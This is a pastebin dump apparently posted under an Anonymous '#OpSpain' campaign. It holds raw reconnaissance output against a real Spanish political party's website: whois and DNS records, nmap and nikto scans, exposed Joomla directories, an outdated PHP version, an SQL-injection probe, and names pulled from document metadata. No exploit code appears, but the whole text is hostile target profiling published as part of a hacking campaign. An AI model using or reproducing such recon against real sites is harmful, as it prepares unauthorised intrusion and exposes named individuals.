Anonymous JTSEC #OpSpain Full Recon #2

a guest
Nov 7th, 2018
  1. #######################################################################################################################################
  2. Hostname falange-autentica.es ISP OVH SAS
  3. Continent Europe Flag
  4. FR
  5. Country France Country Code FR
  6. Region Unknown Local time 07 Nov 2018 22:25 CET
  7. City Unknown Postal Code Unknown
  8. IP Address 91.121.2.184 Latitude 48.858
  9. Longitude 2.339
  10. #######################################################################################################################################
  11. > falange-autentica.es
  12. Server: 194.187.251.67
  13. Address: 194.187.251.67#53
  14.  
  15. Non-authoritative answer:
  16. Name: falange-autentica.es
  17. Address: 91.121.2.184
  18. #######################################################################################################################################
  19. HostIP:91.121.2.184
  20. HostName:falange-autentica.es
  21.  
  22. Gathered Inet-whois information for 91.121.2.184
  23. ---------------------------------------------------------------------------------------------------------------------------------------
  24.  
  25.  
  26. inetnum: 91.121.0.0 - 91.121.31.255
  27. netname: OVH
  28. descr: OVH SAS
  29. descr: Dedicated Servers
  30. descr: http://www.ovh.com
  31. country: FR
  32. admin-c: OK217-RIPE
  33. tech-c: OTC2-RIPE
  34. status: ASSIGNED PA
  35. mnt-by: OVH-MNT
  36. created: 2006-10-16T12:52:42Z
  37. last-modified: 2006-10-16T12:52:42Z
  38. source: RIPE
  39.  
  40. role: OVH Technical Contact
  41. address: OVH SAS
  42. address: 2 rue Kellermann
  43. address: 59100 Roubaix
  44. address: France
  45. admin-c: OK217-RIPE
  46. tech-c: GM84-RIPE
  47. tech-c: SL10162-RIPE
  48. nic-hdl: OTC2-RIPE
  49. abuse-mailbox: abuse@ovh.net
  50. mnt-by: OVH-MNT
  51. created: 2004-01-28T17:42:29Z
  52. last-modified: 2014-09-05T10:47:15Z
  53. source: RIPE # Filtered
  54.  
  55. person: Octave Klaba
  56. address: OVH SAS
  57. address: 2 rue Kellermann
  58. address: 59100 Roubaix
  59. address: France
  60. phone: +33 9 74 53 13 23
  61. nic-hdl: OK217-RIPE
  62. mnt-by: OVH-MNT
  63. created: 1970-01-01T00:00:00Z
  64. last-modified: 2017-10-30T21:44:51Z
  65. source: RIPE # Filtered
  66.  
  67. % Information related to '91.121.0.0/16AS16276'
  68.  
  69. route: 91.121.0.0/16
  70. descr: OVH ISP
  71. descr: Paris, France
  72. origin: AS16276
  73. mnt-by: OVH-MNT
  74. created: 2007-10-16T17:33:02Z
  75. last-modified: 2007-10-16T17:33:02Z
  76. source: RIPE # Filtered
  77.  
  78. % This query was served by the RIPE Database Query Service version 1.92.6 (ANGUS)
  79.  
  80.  
  81.  
  82. Gathered Inic-whois information for falange-autentica.es
  83. ---------------------------------------------------------------------------------------------------------------------------------------
  84.  
  85. Gathered Netcraft information for falange-autentica.es
  86. ---------------------------------------------------------------------------------------------------------------------------------------
  87.  
  88. Retrieving Netcraft.com information for falange-autentica.es
  89. Netcraft.com Information gathered
  90.  
  91. Gathered Subdomain information for falange-autentica.es
  92. ---------------------------------------------------------------------------------------------------------------------------------------
  93. Searching Google.com:80...
  94. Searching Altavista.com:80...
  95. Found 0 possible subdomain(s) for host falange-autentica.es, Searched 0 pages containing 0 results
  96.  
  97. Gathered E-Mail information for falange-autentica.es
  98. ---------------------------------------------------------------------------------------------------------------------------------------
  99. Searching Google.com:80...
  100. Searching Altavista.com:80...
  101. Found 0 E-Mail(s) for host falange-autentica.es, Searched 0 pages containing 0 results
  102.  
  103. Gathered TCP Port information for 91.121.2.184
  104. ---------------------------------------------------------------------------------------------------------------------------------------
  105.  
  106. Port State
  107.  
  108. 22/tcp open
  109. 80/tcp open
  110.  
  111. Portscan Finished: Scanned 150 ports, 2 ports were in sta
  112. #######################################################################################################################################
  113. [i] Scanning Site: http://falange-autentica.es
  114.  
  115.  
  116.  
  117. B A S I C I N F O
  118. =======================================================================================================================================
  119.  
  120.  
  121. [+] Site Title: Falange Auténtica
  122. [+] IP address: 91.121.2.184
  123. [+] Web Server: Could Not Detect
  124. [+] CMS: Joomla
  125. [+] Cloudflare: Not Detected
  126. [+] Robots File: Found
  127.  
  128. -------------[ contents ]----------------
  129. # If the Joomla site is installed within a folder such as at
  130. # e.g. www.example.com/joomla/ the robots.txt file MUST be
  131. # moved to the site root at e.g. www.example.com/robots.txt
  132. # AND the joomla folder name MUST be prefixed to the disallowed
  133. # path, e.g. the Disallow rule for the /administrator/ folder
  134. # MUST be changed to read Disallow: /joomla/administrator/
  135. #
  136. # For more information about the robots.txt standard, see:
  137. # http://www.robotstxt.org/orig.html
  138. #
  139. # For syntax checking, see:
  140. # http://tool.motoricerca.info/robots-checker.phtml
  141.  
  142. User-agent: *
  143. Disallow: /administrator/
  144. Disallow: /bin/
  145. Disallow: /cache/
  146. Disallow: /cli/
  147. Disallow: /components/
  148. Disallow: /includes/
  149. Disallow: /installation/
  150. Disallow: /language/
  151. Disallow: /layouts/
  152. Disallow: /libraries/
  153. Disallow: /logs/
  154. Disallow: /modules/
  155. Disallow: /plugins/
  156. Disallow: /tmp/
  157.  
  158.  
  159. -----------[end of contents]-------------
  160.  
  161.  
  162.  
  163.  
  164. G E O I P L O O K U P
  165. =======================================================================================================================================
  166.  
  167. [i] IP Address: 91.121.2.184
  168. [i] Country: FR
  169. [i] State: N/A
  170. [i] City: N/A
  171. [i] Latitude: 48.858200
  172. [i] Longitude: 2.338700
  173.  
  174.  
  175.  
  176.  
  177. H T T P H E A D E R S
  178. =======================================================================================================================================
  179.  
  180.  
  181. [i] HTTP/1.1 200 OK
  182. [i] Date: Wed, 07 Nov 2018 22:07:06 GMT
  183. [i] X-Powered-By: PHP/5.6.14
  184. [i] Set-Cookie: 2b5581ae182de78f0daf6795785a3ed8=9ao0ophv6hn0pi59ji0fsfv1c2; path=/; HttpOnly
  185. [i] Expires: Wed, 17 Aug 2005 00:00:00 GMT
  186. [i] Last-Modified: Wed, 07 Nov 2018 22:07:07 GMT
  187. [i] Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  188. [i] Pragma: no-cache
  189. [i] Vary: Accept-Encoding
  190. [i] Content-Type: text/html; charset=utf-8
  191. [i] Connection: close
  192.  
  193.  
  194.  
  195.  
  196. D N S L O O K U P
  197. =======================================================================================================================================
  198.  
  199. falange-autentica.es. 21599 IN SOA dns106.ovh.net. tech.ovh.net. 2018100200 86400 3600 3600000 300
  200. falange-autentica.es. 21599 IN NS ns106.ovh.net.
  201. falange-autentica.es. 21599 IN NS dns106.ovh.net.
  202. falange-autentica.es. 21599 IN A 91.121.2.184
  203. falange-autentica.es. 599 IN TXT "v=spf1 ip4:46.105.219.212 ~all"
  204. falange-autentica.es. 599 IN TXT "v=spf1 a mx ip4:91.121.2.184 ~all"
  205. falange-autentica.es. 599 IN TXT "google-site-verification=XeCXnycOOchTyn4oLnoD2WYHlYWJFP_sTsHT9CVGEoE"
  206.  
  207.  
  208.  
  209.  
  210. S U B N E T C A L C U L A T I O N
  211. =======================================================================================================================================
  212.  
  213. Address = 91.121.2.184
  214. Network = 91.121.2.184 / 32
  215. Netmask = 255.255.255.255
  216. Broadcast = not needed on Point-to-Point links
  217. Wildcard Mask = 0.0.0.0
  218. Hosts Bits = 0
  219. Max. Hosts = 1 (2^0 - 0)
  220. Host Range = { 91.121.2.184 - 91.121.2.184 }
  221.  
  222.  
  223.  
  224. N M A P P O R T S C A N
  225. =======================================================================================================================================
  226.  
  227.  
  228. Starting Nmap 7.40 ( https://nmap.org ) at 2018-11-07 22:07 UTC
  229. Nmap scan report for falange-autentica.es (91.121.2.184)
  230. Host is up (0.076s latency).
  231. PORT STATE SERVICE
  232. 21/tcp filtered ftp
  233. 22/tcp open ssh
  234. 23/tcp filtered telnet
  235. 80/tcp open http
  236. 110/tcp filtered pop3
  237. 143/tcp filtered imap
  238. 443/tcp open https
  239. 3389/tcp filtered ms-wbt-server
  240.  
  241. Nmap done: 1 IP address (1 host up) scanned in 2.08 seconds
  242. #######################################################################################################################################
  243.  
  244. [?] Enter the target: http://falange-autentica.es/
  245. [!] IP Address : 91.121.2.184
  246. [!] falange-autentica.es doesn't seem to use a CMS
  247. [+] Honeypot Probabilty: 30%
  248. ---------------------------------------------------------------------------------------------------------------------------------------
  249. [~] Trying to gather whois information for falange-autentica.es
  250. [+] Whois information found
  251. [-] Unable to build response, visit https://who.is/whois/falange-autentica.es
  252. ---------------------------------------------------------------------------------------------------------------------------------------
  253. PORT STATE SERVICE
  254. 21/tcp filtered ftp
  255. 22/tcp open ssh
  256. 23/tcp filtered telnet
  257. 80/tcp open http
  258. 110/tcp filtered pop3
  259. 143/tcp filtered imap
  260. 443/tcp open https
  261. 3389/tcp filtered ms-wbt-server
  262. Nmap done: 1 IP address (1 host up) scanned in 1.59 seconds
  263. ---------------------------------------------------------------------------------------------------------------------------------------
  264.  
  265. [+] DNS Records
  266. ns106.ovh.net. (213.251.128.150) AS16276 OVH SAS France
  267. dns106.ovh.net. (213.251.188.150) AS16276 OVH SAS France
  268.  
  269. [+] Host Records (A)
  270. falange-autentica.esHTTP: (falange-autentica.es) (91.121.2.184) AS16276 OVH SAS France
  271.  
  272. [+] TXT Records
  273. "google-site-verification=XeCXnycOOchTyn4oLnoD2WYHlYWJFP_sTsHT9CVGEoE"
  274. "v=spf1 a mx ip4:91.121.2.184 ~all"
  275. "v=spf1 ip4:46.105.219.212 ~all"
  276.  
  277. [+] DNS Map: https://dnsdumpster.com/static/map/falange-autentica.es.png
  278.  
  279. [>] Initiating 3 intel modules
  280. [>] Loading Alpha module (1/3)
  281. [>] Beta module deployed (2/3)
  282. [>] Gamma module initiated (3/3)
  283. No emails found
  284.  
  285. [+] Hosts found in search engines:
  286. ---------------------------------------------------------------------------------------------------------------------------------------
  287. [-] Resolving hostnames IPs...
  288. 91.121.2.184:www.falange-autentica.es
  289. [+] Virtual hosts:
  290. ---------------------------------------------------------------------------------------------------------------------------------------
  291. [~] Crawling the target for fuzzable URLs
  292. [+] Found 3 fuzzable URLs
  293. http://falange-autentica.es///descargas/category/1-documentos-de-fa?download=12:decalogo-de-actuacion-de-falange-autentica
  294. [~] Using SQLMap api to check for SQL injection vulnerabilities. Don't worry we are using an online service and it doesn't depend on your internet connection. This scan will take 2-3 minutes.
  295. #######################################################################################################################################
  296. ; <<>> DiG 9.11.5-1-Debian <<>> falange-autentica.es
  297. ;; global options: +cmd
  298. ;; Got answer:
  299. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39060
  300. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
  301.  
  302. ;; OPT PSEUDOSECTION:
  303. ; EDNS: version: 0, flags:; udp: 4096
  304. ;; QUESTION SECTION:
  305. ;falange-autentica.es. IN A
  306.  
  307. ;; ANSWER SECTION:
  308. falange-autentica.es. 82921 IN A 91.121.2.184
  309.  
  310. ;; Query time: 118 msec
  311. ;; SERVER: 194.187.251.67#53(194.187.251.67)
  312. ;; WHEN: mer nov 07 17:22:57 EST 2018
  313. ;; MSG SIZE rcvd: 65
  314. #######################################################################################################################################
  315.  
  316. [+] Hosting Info for Website: falange-autentica.es
  317. [+] Visitors per day: < 200
  318. [+] IP Address: ...
  319. [+] IP Reverse DNS (Host): falange-autentica.es
  320. [+] Hosting Company: Ovh Sas
  321. [+] Hosting IP Range: 91.121.0.0 - 91.121.255.255 (65,536 ip)
  322. [+] Hosting Address: 140 Quai Du Sartel, 59100 Roubaix, France
  323. [+] Hosting Country: FRA
  324. [+] Hosting Phone: +33 9 7453 1323, +33 3 2020 0957
  325. [+] Hosting Website: www.ovh.com
  326. [+] Hosting CIDR: 91.121.0.0/16
  327.  
  328. [+] NS: ns106.ovh.net
  329. [+] NS: dns106.ovh.net
  330.  
  331. #######################################################################################################################################
  332. ; <<>> DiG 9.11.5-1-Debian <<>> +trace falange-autentica.es
  333. ;; global options: +cmd
  334. . 82650 IN NS d.root-servers.net.
  335. . 82650 IN NS k.root-servers.net.
  336. . 82650 IN NS i.root-servers.net.
  337. . 82650 IN NS a.root-servers.net.
  338. . 82650 IN NS e.root-servers.net.
  339. . 82650 IN NS f.root-servers.net.
  340. . 82650 IN NS c.root-servers.net.
  341. . 82650 IN NS j.root-servers.net.
  342. . 82650 IN NS b.root-servers.net.
  343. . 82650 IN NS m.root-servers.net.
  344. . 82650 IN NS l.root-servers.net.
  345. . 82650 IN NS h.root-servers.net.
  346. . 82650 IN NS g.root-servers.net.
  347. . 82650 IN RRSIG NS 8 0 518400 20181120170000 20181107160000 2134 . EVTqzwzG0hnuJKklOR7lNHckad/RioIyUapKgDQgyj4Q0Zu+EfA1hNvR TN1sKG2sEpsMd20tqRWThT1YOc284u/LoHJAU9DeMrAqfzoyvaU8/8gT h+2lod/iTuPNgPiY0QGucvxflIzL+u3KG5G0xRxlGWdxYUpWKwAGN3O1 whxDrD3kJR3Ye/2+qpvAOTqRHJ1Ka5NrvtjTQT68ez/IajhkUVny2ZsH rmrxAkIhPRTlOOXYG8EBTj8Tv2Rsazf5AwSL+X8Of5XECRVAmc/+z9AR GjJHHvDY2xA1MCL77TSDQ81fcVd6fgoP7GKevQdWG9T7/ILtPrcbtFRk leXAUw==
  348. ;; Received 525 bytes from 194.187.251.67#53(194.187.251.67) in 122 ms
  349.  
  350. es. 172800 IN NS ns-ext.nic.cl.
  351. es. 172800 IN NS g.nic.es.
  352. es. 172800 IN NS a.nic.es.
  353. es. 172800 IN NS ns3.nic.fr.
  354. es. 172800 IN NS ns1.cesca.es.
  355. es. 172800 IN NS f.nic.es.
  356. es. 172800 IN NS sns-pb.isc.org.
  357. es. 86400 IN DS 29450 8 1 417BEAFB46ABF3430B75C5C29AEF785D476B60E1
  358. es. 86400 IN DS 29450 8 2 8BEC32A2C9CFE42E393BAF81FFE71B521D3E940612A4590B4763ADC5 39E4B563
  359. es. 86400 IN DS 44290 8 1 7711F564D55B41C8CE7DFAF4DD323C5B271F86CD
  360. es. 86400 IN DS 44290 8 2 562EF35E7065588A7178A4BD0155C8527F029C82AA455DD359C84908 B2A7FE17
  361. es. 86400 IN RRSIG DS 8 1 86400 20181120170000 20181107160000 2134 . z6ORJ779JiCk9ZSEYD5qnh3cD5jOFWer10n8NfgcKB9bxLYHbxdotJAo m8Qio1YhqhI6LB7SdMp4Qi0Mpt71HcO3jhdQBcD08o+dTws+YwRYb7qC VhPTY2gMoI8pMkhZhCZK827HcCLFkvza1NIV9LMOs015U0x22DOASXtS 8zKn9MnW2aywbyAkS3m1X+y2n56DA5qlA80ObijjkTtlavqWaLRkvBxI oEO3RqMYhGXp0ARvygUkQKlPnjzBr2W+BxYQd9EktzvvF1iat/2gFsXC xC9qPgtVx9i9xT23TMET3vScxASN5kT7ESE6R2AxfYx7YskcGpcGRGHM /S3nNQ==
  362. ;; Received 995 bytes from 2001:500:2f::f#53(f.root-servers.net) in 377 ms
  363.  
  364. falange-autentica.es. 86400 IN NS dns106.ovh.net.
  365. falange-autentica.es. 86400 IN NS ns106.ovh.net.
  366. spo5r5bnu2j5g2posr633lrok075or26.es. 86400 IN NSEC3 1 1 5 557CEB9FD142AE07 SPOVUI8LLS5HHLJ0I6TEK8ODTJ0PV8PM NS SOA RRSIG DNSKEY NSEC3PARAM
  367. spo5r5bnu2j5g2posr633lrok075or26.es. 86400 IN RRSIG NSEC3 8 2 86400 20181121051641 20181107010649 64315 es. WibiqeGxP7swWy8WJMC67rD0fXoQlpMxJPJJunU2YlLDMXZ3Fd4U2RK7 rHsIA/dsEO41GCa9V4v9khQBqCohEaxtna2hamwhfax+k2LsNP62oy0S nuP4HSwtH+fc4zBY5w42orQnksL0mxd4WgU0fC/zRJaOc5NelfeKRvM0 GAs=
  368. 8tv8o4m77cpqau0bg4jo93okkp1ilfg2.es. 86400 IN NSEC3 1 1 5 557CEB9FD142AE07 8U28NLNHQSDPDBK8C201MOME1I7TT22I NS DS RRSIG
  369. 8tv8o4m77cpqau0bg4jo93okkp1ilfg2.es. 86400 IN RRSIG NSEC3 8 2 86400 20181121094347 20181107073540 22150 es. DczNf3zLq8Zw2pa0uaspr6GvATBEYJm7nO4faMHIeTJxCkKITzf+O1HR Jxu7e/8yHuGYHbzD8ABVLnUbLirAlks4e6ENfGBLPvwS7mxBgpgV849z vcoe51fBThvolELyHkG94FenjHOLKRZ/eD1BS35pH+h029h5DVgQUOjp iRY=
  370. ;; Received 596 bytes from 130.206.1.7#53(f.nic.es) in 160 ms
  371.  
  372. falange-autentica.es. 86400 IN A 91.121.2.184
  373. ;; Received 65 bytes from 2001:41d0:1:1996::1#53(ns106.ovh.net) in 121 ms
  374.  
  375. #######################################################################################################################################
  376. [+] Testing domain
  377. www.falange-autentica.es 91.121.2.184
  378. [+] Dns resolving
  379. Domain name Ip address Name server
  380. falange-autentica.es 91.121.2.184 falange-autentica.es
  381. Found 1 host(s) for falange-autentica.es
  382. [+] Testing wildcard
  383. Ok, no wildcard found.
  384.  
  385. [+] Scanning for subdomain on falange-autentica.es
  386. [!] Wordlist not specified. I scannig with my internal wordlist...
  387. Estimated time about 68.35 seconds
  388.  
  389. Subdomain Ip address Name server
  390.  
  391. mail.falange-autentica.es 91.121.2.184 falange-autentica.es
  392. smtp.falange-autentica.es 193.70.18.144 ssl0.ovh.net
  393. www.falange-autentica.es 91.121.2.184 falange-autentica.es
  394. #######################################################################################################################################
  395. Ip Address Status Type Domain Name Server
  396. ---------------------------------------------------------------------------------------------------------------------------------------
  397. 91.121.2.184 302 host mail.falange-autentica.es Apache
  398. 193.70.18.144 301 alias smtp.falange-autentica.es
  399. 193.70.18.144 301 host ns0.ovh.net
  400. 91.121.2.184 200 alias www.falange-autentica.es Apache
  401. 91.121.2.184 200 host falange-autentica.es Apache
  402. #######################################################################################################################################
  403. [*] Performing General Enumeration of Domain: falange-autentica.es
  404. [-] DNSSEC is not configured for falange-autentica.es
  405. [*] SOA dns106.ovh.net 213.251.188.150
  406. [*] NS dns106.ovh.net 213.251.188.150
  407. [*] Bind Version for 213.251.188.150 [Secured]
  408. [*] NS dns106.ovh.net 2001:41d0:1:4a96::1
  409. [*] Bind Version for 2001:41d0:1:4a96::1 [Secured]
  410. [*] NS ns106.ovh.net 213.251.128.150
  411. [*] Bind Version for 213.251.128.150 [Secured]
  412. [*] NS ns106.ovh.net 2001:41d0:1:1996::1
  413. [*] Bind Version for 2001:41d0:1:1996::1 [Secured]
  414. [-] Could not Resolve MX Records for falange-autentica.es
  415. [*] A falange-autentica.es 91.121.2.184
  416. [*] TXT falange-autentica.es v=spf1 a mx ip4:91.121.2.184 ~all
  417. [*] TXT falange-autentica.es google-site-verification=XeCXnycOOchTyn4oLnoD2WYHlYWJFP_sTsHT9CVGEoE
  418. [*] TXT falange-autentica.es v=spf1 ip4:46.105.219.212 ~all
  419. [*] Enumerating SRV Records
  420. [-] No SRV Records Found for falange-autentica.es
  421. [+] 0 Records Found
  422. #######################################################################################################################################
  423. [*] Processing domain falange-autentica.es
  424. [+] Getting nameservers
  425. 213.251.188.150 - dns106.ovh.net
  426. 213.251.128.150 - ns106.ovh.net
  427. [-] Zone transfer failed
  428.  
  429. [+] TXT records found
  430. "v=spf1 a mx ip4:91.121.2.184 ~all"
  431. "google-site-verification=XeCXnycOOchTyn4oLnoD2WYHlYWJFP_sTsHT9CVGEoE"
  432. "v=spf1 ip4:46.105.219.212 ~all"
  433.  
  434. [*] Scanning falange-autentica.es for A records
  435. 91.121.2.184 - falange-autentica.es
  436. 91.121.2.184 - mail.falange-autentica.es
  437. 193.70.18.144 - smtp.falange-autentica.es
  438. 91.121.2.184 - www.falange-autentica.es
  439.  
  440. #######################################################################################################################################
  441. Starting Parsero v0.75 (https://github.com/behindthefirewalls/Parsero) at 11/07/18 17:45:38
  442. Parsero scan report for falange-autentica.es
  443. http://falange-autentica.es/components/ 200 OK
  444. http://falange-autentica.es/administrator/ 301 Moved Permanently
  445. http://falange-autentica.es/libraries/ 200 OK
  446. http://falange-autentica.es/tmp/ 200 OK
  447. http://falange-autentica.es/layouts/ 200 OK
  448. http://falange-autentica.es/cache/ 200 OK
  449. http://falange-autentica.es/bin/ 200 OK
  450. http://falange-autentica.es/language/ 200 OK
  451. http://falange-autentica.es/logs/ 200 OK
  452. http://falange-autentica.es/includes/ 200 OK
  453. http://falange-autentica.es/cli/ 200 OK
  454. http://falange-autentica.es/plugins/ 200 OK
  455. http://falange-autentica.es/installation/ 404 Not Found
  456. http://falange-autentica.es/modules/ 200 OK
  457.  
  458. [+] 14 links have been analyzed and 12 of them are available!!!
  459. #######################################################################################################################################
  460. Start: 2018-11-07T22:49:27+0000
  461. HOST: web01 Loss% Snt Last Avg Best Wrst StDev
  462. 1.|-- 45.79.12.202 0.0% 3 0.7 1.1 0.7 1.7 0.6
  463. 2.|-- 45.79.12.6 0.0% 3 0.8 0.8 0.6 1.1 0.3
  464. 3.|-- 45.79.12.8 0.0% 3 0.8 0.7 0.5 0.9 0.2
  465. 4.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
  466. 5.|-- be100-2.dfw-da2-bb1-a9.tx.us 0.0% 3 1.9 2.0 1.9 2.2 0.2
  467. 6.|-- ash-1-a9.tx.us 0.0% 3 32.1 32.4 32.0 33.0 0.6
  468. 7.|-- be100-1039.nwk-1-a9.nj.us 0.0% 3 37.3 37.3 37.3 37.3 0.0
  469. 8.|-- be100-1295.ldn-1-a9.uk.eu 0.0% 3 103.5 103.6 103.5 103.7 0.1
  470. 9.|-- be100-1041.rbx-g1-nc5.fr.eu 0.0% 3 107.4 107.8 107.4 108.4 0.5
  471. 10.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
  472. 11.|-- rbx1-c1-a72.fr.eu 0.0% 3 106.5 106.6 106.5 106.9 0.2
  473. 12.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
  474. 13.|-- falange-autentica.es 0.0% 3 106.3 106.4 106.3 106.4 0.0
  475.  
  476. #######################################################################################################################################
  477. ---------------------------------------------------------------------------------------------------------------------------------------
  478. + Target IP: 91.121.2.184
  479. + Target Hostname: 91.121.2.184
  480. + Target Port: 443
  481. ---------------------------------------------------------------------------------------------------------------------------------------
  482. + SSL Info: Subject: /CN=azulmania.es
  483. Ciphers: ECDHE-RSA-AES256-GCM-SHA384
  484. Issuer: /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
  485. + Start Time: 2018-11-07 17:08:42 (GMT-5)
  486. ---------------------------------------------------------------------------------------------------------------------------------------
  487. + Server: Apache
  488. + Retrieved x-powered-by header: PHP/5.6.14
  489. + The anti-clickjacking X-Frame-Options header is not present.
  490. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  491. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
  492. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  493. + Root page / redirects to: http://azulmania.es/
  494. + "robots.txt" contains 85 entries which should be manually viewed.
  495. + The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
  496. + Hostname '91.121.2.184' does not match certificate's names: azulmania.es
  497. + 8431 requests: 0 error(s) and 8 item(s) reported on remote host
  498. + End Time: 2018-11-07 18:34:09 (GMT-5) (5127 seconds)
  499. ---------------------------------------------------------------------------------------------------------------------------------------
  500. #######################################################################################################################################
  501. ---------------------------------------------------------------------------------------------------------------------------------------
  502. + Target IP: 91.121.2.184
  503. + Target Hostname: falange-autentica.es
  504. + Target Port: 80
  505. + Start Time: 2018-11-07 17:07:57 (GMT-5)
  506. ---------------------------------------------------------------------------------------------------------------------------------------
  507. + Server: No banner retrieved
  508. + Retrieved x-powered-by header: PHP/5.6.14
  509. + The anti-clickjacking X-Frame-Options header is not present.
  510. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  511. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  512. + Server leaks inodes via ETags, header found with file /robots.txt, inode: 2361571, size: 842, mtime: Thu Dec 24 12:51:58 2015
  513. + Entry '/administrator/' in robots.txt returned a non-forbidden or redirect HTTP code (301)
  514. + Entry '/bin/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  515. + Entry '/cache/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  516. + Entry '/cli/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  517. + Entry '/components/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  518. + Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  519. + Entry '/language/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  520. + Entry '/layouts/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  521. + Entry '/libraries/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  522. + Entry '/logs/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  523. + Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  524. + Entry '/plugins/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  525. + Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
  526. + "robots.txt" contains 14 entries which should be manually viewed.
  527. + Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_URL 0
  528. + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
  529. + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
  530. + Server banner has changed from '' to 'Apache' which may suggest a WAF, load balancer or proxy is in place
  531. + /servlet/webacc?User.html=noexist: Netware web access may reveal full path of the web server. Apply vendor patch or upgrade.
  532. + /contents/extensions/asp/1: The IIS system may be vulnerable to a DOS, see http://www.microsoft.com/technet/security/bulletin/MS02-018.asp for details.
  533. + OSVDB-578: /level/16: CISCO HTTP service allows remote execution of commands
  534. + OSVDB-155: /counter/1/n/n/0/3/5/0/a/123.gif: The Roxen Counter may eat up excessive CPU time with image requests.
  535. #######################################################################################################################################
  536. dnsenum VERSION:1.2.4
  537.  
  538. ----- falange-autentica.es -----
  539.  
  540.  
  541. Host's addresses:
  542. __________________
  543.  
  544. falange-autentica.es. 83723 IN A 91.121.2.184
  545.  
  546.  
  547. Name Servers:
  548. ______________
  549.  
  550. dns106.ovh.net. 86126 IN A 213.251.188.150
  551. ns106.ovh.net. 86125 IN A 213.251.128.150
  552.  
  553.  
  554. Mail (MX) Servers:
  555. ___________________
  556.  
  557.  
  558.  
  559. Trying Zone Transfers and getting Bind Versions:
  560. _________________________________________________
  561.  
  562.  
  563. Trying Zone Transfer for falange-autentica.es on dns106.ovh.net ...
  564.  
  565. Trying Zone Transfer for falange-autentica.es on ns106.ovh.net ...
  566.  
  567. brute force file not specified, bay.
  568. #######################################################################################################################################
  569. ---------------------------------------------------------------------------------------------------------------------------------------
  570. [2/25] http://www.falange-autentica.es/fa/pica/pica004.pdf
  571. [3/25] http://www.falange-autentica.es/fa/docus/Mocion_FA_Pobreza_Cero.pdf
  572. [4/25] http://www.falange-autentica.es/fa/gora_beti/gora_beti001.pdf
  573. [5/25] http://www.falange-autentica.es/fa/docus/doc15.pdf
  574. [6/25] http://www.falange-autentica.es/fa/amina/t_amina.pdf
  575. [7/25] http://www.falange-autentica.es/fa/amina/solicitud.pdf
  576. [8/25] http://www.falange-autentica.es/fa/mayo2003/programas/p_torrevieja.pdf
  577. [9/25] http://www.falange-autentica.es/fa/mayo2003/programas/p_hoyo.pdf
  578. [10/25] http://www.falange-autentica.es/fa/pica/pica002-seg.pdf
  579. [11/25] http://falange-autentica.es/fa/mayo2003/programas/p_ardales.pdf
  580. [12/25] http://www.falange-autentica.es/fa/mayo2003/programas/p_guarena.pdf
  581. [13/25] http://falange-autentica.es/fa/generales2004/20040228-alicante.pdf
  582. [14/25] http://www.falange-autentica.es/descargas/category/6-horizonte%3Fdownload%3D49:horizonte-n-15
  583. [x] Error in the parsing process
  584. [15/25] http://www.falange-autentica.es/descargas/category/5-envio%3Fdownload%3D32:envio-n-8
  585. [x] Error in the parsing process
  586. [16/25] http://www.falange-autentica.es/descargas/category/9-pica%3Fdownload%3D41:pica-n-6
  587. [x] Error in the parsing process
  588. [17/25] http://www.falange-autentica.es/descargas/category/9-pica%3Fdownload%3D38:pica-n-3
  589. [x] Error in the parsing process
  590. [18/25] http://www.falange-autentica.es/descargas/category/5-envio%3Fdownload%3D33:envio-n-9
  591. [x] Error in the parsing process
  592. [19/25] http://www.falange-autentica.es/descargas/category/5-envio%3Fdownload%3D29:envio-n-5
  593. [x] Error in the parsing process
  594. [20/25] http://www.falange-autentica.es/descargas/category/6-horizonte%3Fdownload%3D59:horizonte-n-28
  595. [x] Error in the parsing process
  596. [21/25] http://www.falange-autentica.es/descargas/category/6-horizonte%3Fdownload%3D53:horizonte-n-21
  597. [x] Error in the parsing process
  598. [22/25] http://www.falange-autentica.es/descargas/category/6-horizonte%3Fdownload%3D57:horizonte-n-25
  599. [x] Error in the parsing process
  600. [23/25] http://www.falange-autentica.es/descargas/category/9-pica%3Fdownload%3D42:pica-n-7
  601. [x] Error in the parsing process
  602. [24/25] http://www.falange-autentica.es/descargas/category/6-horizonte%3Fdownload%3D60:horizonte-n-29
  603. [x] Error in the parsing process
  604. [25/25] http://www.falange-autentica.es/descargas/category/6-horizonte%3Fdownload%3D50:horizonte-n-16
  605. [x] Error in the parsing process
  606. #######################################################################################################################################
  607. ---------------------------------------------------------------------------------------------------------------------------------------
  608. Francisco Ortiz Lozano
  609. Teo
  610. Falange Auténtica de Euskalerría
  611. COngreso Constituyente. Noviembre de 2002
  612. Falange Auténtica
  613. Torpedo
  614. Torpedo
  615.  
  616. [+] List of software found:
  617. ---------------------------------------------------------------------------------------------------------------------------------------
  618. Acrobat Distiller 5.0 (Windows)
  619. ADOBEPS4.DRV Version 4.50
